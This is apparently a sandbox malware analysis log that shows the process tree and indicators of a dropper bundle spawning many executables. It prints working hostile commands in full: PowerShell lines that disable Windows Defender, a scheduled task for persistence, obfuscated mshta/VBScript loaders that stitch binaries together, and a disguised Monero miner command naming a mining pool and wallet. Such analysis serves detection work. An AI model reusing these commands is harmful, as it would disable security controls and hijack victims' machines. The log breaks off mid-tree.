Token: SeDebugPrivilege	2632	4.exe
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeDebugPrivilege	2664	5.exe
Token: SeDebugPrivilege	2144	Sun03f0dc4460bc9.exe
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeDebugPrivilege	2904	6.exe
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeDebugPrivilege	2480	WerFault.exe
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeShutdownPrivilege	1284	Process not Found
Token: SeDebugPrivilege	2132	3793266.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	1836	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	2720	4691549.exe

Suspicious use of FindShellTrayWindow 19 IoCs

pid	Process
1248	Sun03f5d51697d04.tmp
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found
1284	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	28
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	28
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	28
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	28
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	28
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	28
PID 1692 wrote to memory of 2028	1692	setup_x86_x64_install.exe	28
PID 2028 wrote to memory of 680	2028	setup_installer.exe	29
PID 2028 wrote to memory of 680	2028	setup_installer.exe	29
PID 2028 wrote to memory of 680	2028	setup_installer.exe	29
PID 2028 wrote to memory of 680	2028	setup_installer.exe	29
PID 2028 wrote to memory of 680	2028	setup_installer.exe	29
PID 2028 wrote to memory of 680	2028	setup_installer.exe	29
PID 2028 wrote to memory of 680	2028	setup_installer.exe	29
PID 680 wrote to memory of 1556	680	setup_install.exe	31
PID 680 wrote to memory of 1556	680	setup_install.exe	31
PID 680 wrote to memory of 1556	680	setup_install.exe	31
PID 680 wrote to memory of 1556	680	setup_install.exe	31
PID 680 wrote to memory of 1556	680	setup_install.exe	31
PID 680 wrote to memory of 1556	680	setup_install.exe	31
PID 680 wrote to memory of 1556	680	setup_install.exe	31
PID 680 wrote to memory of 1560	680	setup_install.exe	32
PID 680 wrote to memory of 1560	680	setup_install.exe	32
PID 680 wrote to memory of 1560	680	setup_install.exe	32
PID 680 wrote to memory of 1560	680	setup_install.exe	32
PID 680 wrote to memory of 1560	680	setup_install.exe	32
PID 680 wrote to memory of 1560	680	setup_install.exe	32
PID 680 wrote to memory of 1560	680	setup_install.exe	32
PID 1560 wrote to memory of 1300	1560	cmd.exe	34
PID 1560 wrote to memory of 1300	1560	cmd.exe	34
PID 1560 wrote to memory of 1300	1560	cmd.exe	34
PID 1560 wrote to memory of 1300	1560	cmd.exe	34
PID 1560 wrote to memory of 1300	1560	cmd.exe	34
PID 1560 wrote to memory of 1300	1560	cmd.exe	34
PID 1560 wrote to memory of 1300	1560	cmd.exe	34
PID 1556 wrote to memory of 1072	1556	cmd.exe	33
PID 1556 wrote to memory of 1072	1556	cmd.exe	33
PID 1556 wrote to memory of 1072	1556	cmd.exe	33
PID 1556 wrote to memory of 1072	1556	cmd.exe	33
PID 1556 wrote to memory of 1072	1556	cmd.exe	33
PID 1556 wrote to memory of 1072	1556	cmd.exe	33
PID 1556 wrote to memory of 1072	1556	cmd.exe	33
PID 680 wrote to memory of 1852	680	setup_install.exe	35
PID 680 wrote to memory of 1852	680	setup_install.exe	35
PID 680 wrote to memory of 1852	680	setup_install.exe	35
PID 680 wrote to memory of 1852	680	setup_install.exe	35
PID 680 wrote to memory of 1852	680	setup_install.exe	35
PID 680 wrote to memory of 1852	680	setup_install.exe	35
PID 680 wrote to memory of 1852	680	setup_install.exe	35
PID 680 wrote to memory of 1832	680	setup_install.exe	36
PID 680 wrote to memory of 1832	680	setup_install.exe	36
PID 680 wrote to memory of 1832	680	setup_install.exe	36
PID 680 wrote to memory of 1832	680	setup_install.exe	36
PID 680 wrote to memory of 1832	680	setup_install.exe	36
PID 680 wrote to memory of 1832	680	setup_install.exe	36
PID 680 wrote to memory of 1832	680	setup_install.exe	36
PID 680 wrote to memory of 1828	680	setup_install.exe	37
PID 680 wrote to memory of 1828	680	setup_install.exe	37
PID 680 wrote to memory of 1828	680	setup_install.exe	37
PID 680 wrote to memory of 1828	680	setup_install.exe	37
PID 680 wrote to memory of 1828	680	setup_install.exe	37
PID 680 wrote to memory of 1828	680	setup_install.exe	37
PID 680 wrote to memory of 1828	680	setup_install.exe	37
PID 680 wrote to memory of 112	680	setup_install.exe	38

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1692
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1556
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1560
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1300
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe
      4⤵
      Loads dropped DLL
      PID:1852
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03d477f1a31.exe
        
        Sun03d477f1a31.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:856
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone
      4⤵
      Loads dropped DLL
      PID:1832
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun033e271e0ce96c08.exe
        
        Sun033e271e0ce96c08.exe /mixone
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1096
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun033e271e0ce96c08.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun033e271e0ce96c08.exe" & exit
        6⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Sun033e271e0ce96c08.exe" /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2660
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun039750b00c.exe
      4⤵
      PID:1828
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun039750b00c.exe
        
        Sun039750b00c.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3300
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe
      4⤵
      Loads dropped DLL
      PID:112
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f0dc4460bc9.exe
        
        Sun03f0dc4460bc9.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1184
      - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f0dc4460bc9.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f0dc4460bc9.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\mk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mk.exe"
        7⤵
        Executes dropped EXE
        
        PID:2428
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2428 -s 1172
        8⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe
      4⤵
      Loads dropped DLL
      PID:712
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03e4aeb7e43a1c.exe
        
        Sun03e4aeb7e43a1c.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1036
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 800
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2256
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe
      4⤵
      Loads dropped DLL
      PID:1920
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0397381f1f458e.exe
        
        Sun0397381f1f458e.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1088
      - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0397381f1f458e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0397381f1f458e.exe" -u
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe
      4⤵
      Loads dropped DLL
      PID:1800
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun038aa349e3318e.exe
        
        Sun038aa349e3318e.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:1728
      - C:\Users\Admin\Pictures\Adobe Films\EG2euHbbW01B89lCgVNdYQHC.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\EG2euHbbW01B89lCgVNdYQHC.exe"
        6⤵
        Executes dropped EXE
        
        PID:2784
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 1516
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:552
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe
      4⤵
      Loads dropped DLL
      PID:1736
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03ea09aa5c9686e5.exe
        
        Sun03ea09aa5c9686e5.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1584
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:268
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        8⤵
        
        PID:3152
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:3936
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        10⤵
        Creates scheduled task(s)
        
        PID:3980
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        10⤵
        Executes dropped EXE
        
        PID:3312
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
        11⤵
        Suspicious use of SetThreadContext
        
        PID:3484
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        12⤵
        Executes dropped EXE
        
        PID:3424
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        13⤵
        
        PID:3916
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        12⤵
        
        PID:3492
        
        C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:692
        
        C:\Users\Admin\AppData\Roaming\3793266.exe
        
        "C:\Users\Admin\AppData\Roaming\3793266.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2132
        
        C:\Users\Admin\AppData\Roaming\4691549.exe
        
        "C:\Users\Admin\AppData\Roaming\4691549.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:2720
        
        C:\Users\Admin\AppData\Roaming\8709834.exe
        
        "C:\Users\Admin\AppData\Roaming\8709834.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2220
        
        C:\Users\Admin\AppData\Roaming\5717225.exe
        
        "C:\Users\Admin\AppData\Roaming\5717225.exe"
        8⤵
        Executes dropped EXE
        
        PID:2952
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Roaming\5717225.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN (""C:\Users\Admin\AppData\Roaming\5717225.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )
        9⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Roaming\5717225.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "" =="" for %T IN ("C:\Users\Admin\AppData\Roaming\5717225.exe") do taskkill -iM "%~nxT" -f
        10⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE
        
        ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq
        11⤵
        Executes dropped EXE
        
        PID:1720
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If ""/PrWIGG7qbcjwuF1awT~BmZfq "" == """" for %T IN (""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )
        12⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "/PrWIGG7qbcjwuF1awT~BmZfq " =="" for %T IN ("C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE") do taskkill -iM "%~nxT" -f
        13⤵
        
        PID:3524
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCRIPt: cLoSE ( cReatEOBJECT( "wscRIPt.shell" ). rUn ("CMd /c ecHO | SeT /P = ""MZ"" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *" ,0 ,tRUE))
        12⤵
        Modifies Internet Explorer settings
        
        PID:3632
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ecHO | SeT /P = "MZ" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL +XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *
        13⤵
        
        PID:3688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>STBAQR.mZ"
        14⤵
        
        PID:3728
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ecHO "
        14⤵
        
        PID:3720
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s ..\WAvZq~GT.C /u
        14⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -iM "5717225.exe" -f
        11⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1548
        
        C:\Users\Admin\AppData\Roaming\6391113.exe
        
        "C:\Users\Admin\AppData\Roaming\6391113.exe"
        8⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2648
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        9⤵
        Executes dropped EXE
        
        PID:2068
        
        C:\Users\Admin\AppData\Roaming\3606297.exe
        
        "C:\Users\Admin\AppData\Roaming\3606297.exe"
        8⤵
        Executes dropped EXE
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        Executes dropped EXE
        
        PID:1816
        
        C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
        7⤵
        Executes dropped EXE
        
        PID:1076
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 1368
        8⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2632
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2632 -s 1408
        8⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2480
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
        
        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
        7⤵
        Executes dropped EXE
        
        PID:1636
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:516
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:1876
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "search_hyperfs_206.exe"
        10⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        10⤵
        Executes dropped EXE
        
        PID:2376
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        11⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        12⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        11⤵
        
        PID:3820
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        12⤵
        
        PID:3872
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        13⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        13⤵
        
        PID:3920
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y ..\lXQ2g.WC
        13⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:2216
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        8⤵
        
        PID:1100
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:932
        
        C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
        7⤵
        Executes dropped EXE
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        Executes dropped EXE
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2904 -s 1684
        8⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3784
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe
      4⤵
      Loads dropped DLL
      PID:1840
    - - C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe
        
        Sun03f5d51697d04.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1868
      - C:\Users\Admin\AppData\Local\Temp\is-UC2GR.tmp\Sun03f5d51697d04.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UC2GR.tmp\Sun03f5d51697d04.tmp" /SL5="$5015C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe" /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:524
        
        C:\Users\Admin\AppData\Local\Temp\is-7SA3M.tmp\Sun03f5d51697d04.tmp
        
